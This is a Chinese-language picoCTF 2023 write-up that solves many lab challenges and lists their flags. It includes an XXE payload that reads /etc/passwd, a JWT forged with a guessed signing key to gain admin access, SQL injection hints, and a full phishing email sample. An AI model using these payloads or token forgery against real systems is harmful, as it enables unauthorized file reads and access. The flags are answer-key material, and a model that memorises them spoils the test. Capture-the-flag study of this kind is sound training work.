picoCTF2023

0x00 findme

重定向页面有base64编码：cGljb0NURntwcm94aWVzX2FsbF90aGVfd2F5XzM5Mjg2Yzk3fQ== （要两次才能凑齐）

解码后得到picoCTF{proxies_all_the_way_39286c97}

0x01 MatchTheRegex

考一个正则匹配，查看页面源码可以看到匹配内容

function send_request() {
	let val = document.getElementById("name").value;
	// ^p.....F!?
	fetch(`/flag?input=${val}`)
		.then(res => res.text())
		.then(res => {
			const res_json = JSON.parse(res);
			alert(res_json.flag)
			return false;
		})
	return false;
}

输入picoCTF即可

0x02 SOAP

提示是XML外部实体注入,并且要读取/etc/passwd文件

抓包可以发现点击Details之后有xml

直接进行注入

<!DOCTYPE data[
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
    <ID>
        &xxe;
    </ID>
</data>

0x03 More SQLi

sql注入,常规试一下

发现是password and username,所以注入点应该在password

0x04 Java Code Analysis!?!

把源码下载下来

提示要找到 the JWT Signing Key ("secret key")

可以在源文件中找到JwtService.java,

有这样一段源码

@Autowired
 public JwtService(SecretGenerator secretGenerator){
     this.SECRET_KEY = secretGenerator.getServerSecret();
 }

secret key 是由secretGenerator产生，看到SecretGenerator.java

密钥放在server_secret.txt里面，当没有这个文件时密钥为1234

先抓一下包，发现JWT,JWT解码

Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb2xlIjoiRnJlZSIsImlzcyI6ImJvb2tzaGVsZiIsImV4cCI6MTY3OTkxNDQ1MCwiaWF0IjoxNjc5MzA5NjUwLCJ1c2VySWQiOjEsImVtYWlsIjoidXNlciJ9.Y5f4P9ivWsO5AqnXstKtUKyY02s8y8PL9L2msCAkhiI

根据提示要修改 ‘role’ and ‘userId’，而且要使用密钥1234

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb2xlIjoiRnJlZSIsImlzcyI6ImJvb2tzaGVsZiIsImV4cCI6MTY3OTkxNDQ1MCwiaWF0IjoxNjc5MzA5NjUwLCJ1c2VySWQiOjIsImVtYWlsIjoiYWRtaW4ifQ.g7dC751n3puM1TmnXbihfTGNED5EHyq6EmiQ9Gl4Dzs

接下来只要访问到flag对应的pdf就应该可以了

试了几次发现直接访问flag访问不到

第一个是user就能访问的，可以发现pdf所在路径为/base/books/pdf/3

顺过去flag应该就是访问/base/books/pdf/5

然后就出flag啦

0x05 HideToSee

提示ectract，想到linux有一个工具strghide

steghide extract -sf atbash.jpg

提取到xqkwKBN{z0bib1wv_l3kzgxb3l_k34ijli2}

然后利用在线网站或者手动解密

picoCTF{atbash_crack_1f84d779}

0x06 ReadMyCert

下载源件是一个证书

用openssl

openssl req -noout -text -in readmycert.csr

flagpicoCTF{read_mycert_aac33761}

0x07 rotation

凯撒加密

0x08 Reverse

0x09 Safe Opener 2

这两道ida打开直接可以看到flag

0x0A hideme

binwalk 一下发现有隐藏多个文件

foremost一下出flag

0x0B PcapPoisoning

直接搜pico就看到了

0x0C who is it

下载到一封邮件，直接看邮件头

Delivered-To: francismanzi@gmail.com
Received: by 2002:ab0:638a:0:0:0:0:0 with SMTP id y10csp123720uao;
        Thu, 7 Jul 2022 23:19:48 -0700 (PDT)
X-Google-Smtp-Source: AGRyM1u8MgQ0wT0JmPs4nZbKyuwluXeP+mglR/hb66VElgQnwB8M2ofwYUFsHj+eMYBFAVDPITJc
X-Received: by 2002:a5d:6d06:0:b0:21b:c434:d99e with SMTP id e6-20020a5d6d06000000b0021bc434d99emr1524437wrq.148.1657261188086;
        Thu, 07 Jul 2022 23:19:48 -0700 (PDT)
ARC-Seal: i=1; a=rsa-sha256; t=1657261188; cv=none;
        d=google.com; s=arc-20160816;
        b=FJZQS4geDnyabQ7SUhA2v3roEqcufLmysXkLoRZd3yNXiNQFBFmwm5v5yANvDyyebA
         Jfjqv5X8Gujll585xj/MHlVhlEMg0edNWuwnLXj8SmNuPI1Jon9N+fokhSMxy2WxSACE
         4MruPo5QBlHdrFq8WNBAFgC1VtO0nR+BQYY18wqotLIQPvkXo3yOUUhx0D+ZjUwXvTKV
         yUFGdYulF58Lg7wAH/cLWROIHrraWTSsmaGWoYv577nztzueoG5RC5uUAGIAyzsJRqsV
         dCsapFxCUlbYbAgIVraylksCA+veFXfil6ocym8KKnls3j40Vojv0VLhHHZxXruG5x/K
         M5cQ==
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
        h=mime-version:message-id:date:subject:to:from:dkim-signature;
        bh=RneTbuEOZUlwei4ZNPvzjmZpQE92irBmuzImA33zPEc=;
        b=RUd+ycq1YWbRNn9wB8UgJ8dZz0tHpvmqcEGQkWqzLy/6j3aFzaf7dwdoCtXjTTtrrE
         z9g498cmB55fs0x1CAjtzI+Nctb1cbPcnfMCrfsF3LwgYhCErFRnbBbOgqw4eeEB+hk0
         sKBN0QVpSLs1HlF8ZK3XiMKA2p3vSgHlbhMDPGnFTLHEQjlM63d/L30Rt8mpQsT77ni/
         f6X0TqTi4Y8ARIuEELMa6m5E5wQcfUxeUU5WAssz46tQyHKR6xg/g8K2zES+gSNymASk
         c5Eaq55k4Zi8dXWaPIwg4IdhVLVxe4llMx8c46GTdh8tvdMtmjME3wIaFR6Q2SLWRSZA
         o0hw==
ARC-Authentication-Results: i=1; mx.google.com;
       dkim=pass header.i=@onionmail.org header.s=jan2022 header.b=4sU2nk5Z;
       spf=pass (google.com: domain of lpage@onionmail.org designates 173.249.33.206 as permitted sender) smtp.mailfrom=lpage@onionmail.org;
       dmarc=pass (p=NONE sp=NONE dis=NONE) header.from=onionmail.org
Return-Path: <lpage@onionmail.org>
Received: from mail.onionmail.org (mail.onionmail.org. [173.249.33.206])
        by mx.google.com with ESMTPS id f16-20020a05600c4e9000b003a1947873d6si1882702wmq.224.2022.07.07.23.19.47
        for <francismanzi@gmail.com>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Thu, 07 Jul 2022 23:19:47 -0700 (PDT)
Received-SPF: pass (google.com: domain of lpage@onionmail.org designates 173.249.33.206 as permitted sender) client-ip=173.249.33.206;
Authentication-Results: mx.google.com;
       dkim=pass header.i=@onionmail.org header.s=jan2022 header.b=4sU2nk5Z;
       spf=pass (google.com: domain of lpage@onionmail.org designates 173.249.33.206 as permitted sender) smtp.mailfrom=lpage@onionmail.org;
       dmarc=pass (p=NONE sp=NONE dis=NONE) header.from=onionmail.org
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=onionmail.org;
 q=dns/txt; s=jan2022; bh=RneTbuEOZUlwei4ZNPvzjmZpQE92irBmuzImA33zPEc=;
 h=from:subject:date:message-id:to:mime-version:content-type;
 b=4sU2nk5ZG4F9+lCtCPU4nat6ovALqfOHOUM1/wTskeMdmMAa2yOMXy0GkqolIioL8nG0mRG45
 OD8b/nHZZEiA0aQppYHECSmXE7IFIFm/MP9wmXIlC/cDF1t9mEwumdDbes7hRhiO6q3A0wYWK+J
 C+qwHI99irsPhWZOptVVh0HV/HJPAtkzg7OBMX/oPDUSG3xo7dJvT5MCYUm2+4CBVjvLmEPUVTO
 uuVEU3HjVjumry5zw1H4s+o9jxCOwpT41uL94NM64Aki4+KIlS75W8Uo1YStqciHSHoEPLMvBhK
 OMfwhI02u5oLFbk6ZvmhyK5juc54lGbWgk277N0hB0Aw==
Received: from localhost
 by mail.onionmail.org (ZoneMTA) with API id 181dc76dff2000ccee.001
 for <francismanzi@gmail.com>;
 Fri, 08 Jul 2022 06:19:47 +0000
X-Zone-Loop: 83440723a48cf749c9e7702024ee772d7cb2fb7cab7a
Content-Type: multipart/mixed; boundary="--_NmP-426c22a2e0d8fc9a-Part_1"
From: Larry Page <lpage@onionmail.org>
To: francismanzi@gmail.com
Subject: One million Prize
Date: Fri, 08 Jul 2022 06:19:47 +0000
Message-ID: <03c11cd1-8fd9-584e-c9d7-e53df0faeccc@onionmail.org>
MIME-Version: 1.0

----_NmP-426c22a2e0d8fc9a-Part_1
Content-Type: multipart/alternative;
 boundary="--_NmP-426c22a2e0d8fc9a-Part_2"

----_NmP-426c22a2e0d8fc9a-Part_2
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable

Hello dear user, I am Larry Page and I am delighted to announce to you that=
 you
are the 99999999th GMAIL account and for that we want to reward you. =
You've
earned $1,000,000. To claim your prize open the attached file.
----_NmP-426c22a2e0d8fc9a-Part_2
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: quoted-printable

<p>Hello dear user, I am Larry Page and I am delighted to announce to you =
that you are the 99999999th GMAIL account and for that we want to reward =
you. You've earned $1,000,000. To claim your prize open the attached file.=
<br></p>
----_NmP-426c22a2e0d8fc9a-Part_2--

----_NmP-426c22a2e0d8fc9a-Part_1
Content-Type: text/plain; name=attachment.txt
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=attachment.txt

QW1vdW50OiAgJDEsMDAwLDAwMAo=
----_NmP-426c22a2e0d8fc9a-Part_1--

分析一下发现邮件是来自ip173.249.33.206

用whois命令

whois 173.249.33.206

0x0D FindAndOpen

在第48个数据包发现base64编码

解码This is the secret: picoCTF{R34DING_LOKd_

把这一半当做压缩包密码解码得到flagpicoCTF{R34DING_LOKd_fil56_succ3ss_cbf2ebf6}

0x0E MSB

发现图片在各个颜色第七管道变化

直接全部复制下来，然后查找pico

0x0F chrono

0x10 money-ware

提示借助google

0x11 Permissions

步骤同chrono

0x12 repetitions

连续的base64编码

连续解码后得到picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_4557ec3e}

0x13 Rules 2023

直接页面源码搜picoCTF{

0x14 two-sum

下载C语言源码，输入两个数，满足n1 > n1 + n2 OR n2 > n1 + n2

属于整数溢出

c语言int类型溢出是大于2147483647

所以输入 2147483647和1

0x15 Ready Gladiator 0

直接输个end就出flag,没看源码，不知道什么原理picoCTF{h3r0_t0_z3r0_4m1r1gh7_a7bf8a57}

0x16 useless

居然是把flag藏在帮助文档里面

man useless

0x17 timer

用jadx打开在com/example.timer/BuildConfig可以找到flagpicoCTF{t1m3r_r3v3rs3d_succ355fully_17496}